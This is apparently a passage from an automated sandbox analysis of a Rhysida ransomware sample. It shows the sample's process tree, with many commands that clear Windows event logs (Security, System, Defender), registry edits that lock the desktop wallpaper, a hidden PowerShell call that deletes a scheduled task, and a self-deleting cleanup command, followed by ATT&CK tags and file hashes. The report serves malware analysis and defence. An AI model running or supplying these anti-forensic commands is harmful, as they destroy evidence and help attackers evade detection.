C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WWAN-MM-Events/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WWAN-NDISUIO-EVENTS/Diagnostic"4⤵
- Clears Windows event logs
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WWAN-SVC-Events/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WWAN-UI-Events/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WebIO-NDF/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WebIO/Diagnostic"4⤵
- Clears Windows event logs
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WebServices/Tracing"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Win32k/Concurrency"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Win32k/Power"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Win32k/Render"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Win32k/Tracing"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Win32k/UIPI"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WinHTTP-NDF/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WinHttp/Diagnostic"4⤵
- Clears Windows event logs
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WinINet/Analytic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WinRM/Analytic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WinRM/Debug"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WinRM/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Windeploy/Analytic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Windows Defender/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Windows Defender/WHC"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/ConnectionSecurity"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/ConnectionSecurityVerbose"4⤵
- Clears Windows event logs
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/Firewall"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/FirewallVerbose"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WindowsBackup/ActionCenter"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WindowsColorSystem/Debug"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WindowsColorSystem/Operational"4⤵
- Clears Windows event logs
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WindowsSystemAssessmentTool/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WindowsSystemAssessmentTool/Tracing"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WindowsUpdateClient/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Wininit/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Winlogon/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Winlogon/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Winsock-AFD/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Winsock-WS2HELP/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Winsrv/Analytic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Wired-AutoConfig/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Wired-AutoConfig/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Wordpad/Admin"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Wordpad/Debug"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Wordpad/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-mobsync/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ntshrui"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-osk/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-stobject/Diagnostic"4⤵
- Clears Windows event logs
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "OAlerts"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Security"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Setup"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "System"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "TabletPC_InputPanel_Channel"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "WINDOWS_MP4SDECD_CHANNEL"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "WINDOWS_MSMPEG2VDEC_CHANNEL"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "WINDOWS_WMPHOTO_CHANNEL"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "WMPSetup"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "WMPSyncEngine"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Windows PowerShell"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "microsoft-windows-RemoteDesktopServices-RemoteDesktopSessionManager/Admin"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "muxencode"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cmd.exe /c reg delete "HKCU\Contol Panel\Desktop" /v Wallpaper /f2⤵
-
C:\Windows\system32\cmd.execmd.exe /c reg delete "HKCU\Contol Panel\Desktop" /v Wallpaper /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKCU\Contol Panel\Desktop" /v Wallpaper /f4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cmd.exe /c reg delete "HKCU\Conttol Panel\Desktop" /v WallpaperStyle /f2⤵
-
C:\Windows\system32\cmd.execmd.exe /c reg delete "HKCU\Conttol Panel\Desktop" /v WallpaperStyle /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKCU\Conttol Panel\Desktop" /v WallpaperStyle /f4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cmd.exe /c reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop" /v NoChangingWallPaper /t REG_SZ /d 1 /f2⤵
-
C:\Windows\system32\cmd.execmd.exe /c reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop" /v NoChangingWallPaper /t REG_SZ /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop" /v NoChangingWallPaper /t REG_SZ /d 1 /f4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cmd.exe /c reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop" /v NoChangingWallPaper /t REG_SZ /d 1 /f2⤵
-
C:\Windows\system32\cmd.execmd.exe /c reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop" /v NoChangingWallPaper /t REG_SZ /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop" /v NoChangingWallPaper /t REG_SZ /d 1 /f4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cmd.exe /c reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Public\bg.jpg" /f2⤵
-
C:\Windows\system32\cmd.execmd.exe /c reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Public\bg.jpg" /f3⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Public\bg.jpg" /f4⤵
- Sets desktop wallpaper using registry
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cmd.exe /c reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v Wallpaper /t REG_SZ /d "C:\Users\Public\bg.jpg" /f2⤵
-
C:\Windows\system32\cmd.execmd.exe /c reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v Wallpaper /t REG_SZ /d "C:\Users\Public\bg.jpg" /f3⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v Wallpaper /t REG_SZ /d "C:\Users\Public\bg.jpg" /f4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cmd.exe /c reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v WallpaperStyle /t REG_SZ /d 2 /f2⤵
-
C:\Windows\system32\cmd.execmd.exe /c reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v WallpaperStyle /t REG_SZ /d 2 /f3⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v WallpaperStyle /t REG_SZ /d 2 /f4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cmd.exe /c reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d 2 /f2⤵
-
C:\Windows\system32\cmd.execmd.exe /c reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d 2 /f3⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d 2 /f4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c rundll32.exe user32.dll,UpdatePerUserSystemParameters2⤵
-
C:\Windows\system32\rundll32.exerundll32.exe user32.dll,UpdatePerUserSystemParameters3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cmd.exe /c start powershell.exe -WindowStyle Hidden -Command "Sleep -Milliseconds 1000; schtasks /delete /tn Rhsd /f;"2⤵
- Hide Artifacts: Hidden Window
- Indicator Removal: Clear Persistence
-
C:\Windows\system32\cmd.execmd.exe /c start powershell.exe -WindowStyle Hidden -Command "Sleep -Milliseconds 1000; schtasks /delete /tn Rhsd /f;"3⤵
- Hide Artifacts: Hidden Window
- Indicator Removal: Clear Persistence
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden -Command "Sleep -Milliseconds 1000; schtasks /delete /tn Rhsd /f;"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /delete /tn Rhsd /f5⤵
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cmd.exe /c start ping 127.0.0.1 -n 2 > nul && del /f /q "C:\Users\Admin\AppData\Local\Temp\C:\Users\Admin\AppData\Local\Temp\2024-11-21_ddaa09b5c3bf5aa24e300c24905469f2_rhysida.exe"2⤵
- System Network Configuration Discovery: Internet Connection Discovery
-
C:\Windows\system32\cmd.execmd.exe /c start ping 127.0.0.1 -n 23⤵
- System Network Configuration Discovery: Internet Connection Discovery
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 24⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Windows Management Instrumentation
1Defense Evasion
Direct Volume Access
1Hide Artifacts
1Hidden Window
1Indicator Removal
4Clear Persistence
1Clear Windows Event Logs
1File Deletion
2Modify Registry
1Credential Access
Credentials from Password Stores
2Credentials from Web Browsers
1Windows Credential Manager
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
111KB
MD5bae4e959e5862e891b972f2c9116701e
SHA11403d8ed28ac069abfdfe9a2036a74d52a7c7494
SHA25637c8633ee17bdf7ae21a547fee680920c720e9d32d03dd6dd217805de4d487e6
SHA51298e831104c57c70f6af75fe6179f558b3cafd201b355176e8c47abd68592725fb43f30e967e3cf93d3152e61eb77a89ba9fe5c55da205448a1930509949a3344
-
Filesize
560KB
-
Filesize
560KB
-
Filesize
560KB
-
Filesize
560KB
-
Filesize
560KB
-
Filesize
2.9MB
-
Filesize
32KB